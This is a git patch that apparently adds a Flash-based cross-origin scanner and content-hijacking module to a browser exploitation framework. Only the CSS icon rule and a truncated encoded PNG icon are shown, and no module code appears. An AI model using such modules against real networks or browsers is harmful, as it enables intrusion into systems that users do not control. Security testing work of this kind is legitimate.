From 848dc65c6f1aebeb62471e2bc4600ff56d0670fe Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 7 Feb 2016 11:20:55 +0000 Subject: [PATCH] Add cross_origin_scanner_flash module --- extensions/admin_ui/media/css/base.css | 6 + .../admin_ui/media/images/icons/flash.png | Bin 0 -> 27697 bytes .../ui/panel/tabs/ZombieTabNetwork.js | 158 +++++++++++++++- .../ContentHijacking.swf | Bin 0 -> 2881 bytes .../cross_origin_scanner_flash/command.js | 169 ++++++++++++++++++ .../cross_origin_scanner_flash/config.yaml | 16 ++ .../cross_origin_scanner_flash/module.rb | 46 +++++ 7 files changed, 394 insertions(+), 1 deletion(-) create mode 100644 extensions/admin_ui/media/images/icons/flash.png create mode 100644 modules/network/cross_origin_scanner_flash/ContentHijacking.swf create mode 100644 modules/network/cross_origin_scanner_flash/command.js create mode 100644 modules/network/cross_origin_scanner_flash/config.yaml create mode 100644 modules/network/cross_origin_scanner_flash/module.rb diff --git a/extensions/admin_ui/media/css/base.css b/extensions/admin_ui/media/css/base.css index 20899ce9a..ef4bda048 100644 --- a/extensions/admin_ui/media/css/base.css +++ b/extensions/admin_ui/media/css/base.css @@ -156,6 +156,12 @@ background-repeat: no-repeat; } +.network-host-ctxMenu-flash { + background-image: url(../images/icons/flash.png); + background-size: 16px 16px; + background-repeat: no-repeat; +} + .network-host-ctxMenu-shellshock { background-image: url(../images/icons/shellshock.png); background-size: 16px 16px; diff --git a/extensions/admin_ui/media/images/icons/flash.png b/extensions/admin_ui/media/images/icons/flash.png new file mode 100644 index 0000000000000000000000000000000000000000..1edbaa19983d3f7d85f7d91febd044723d2a0ce0 GIT binary patch literal 27697 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 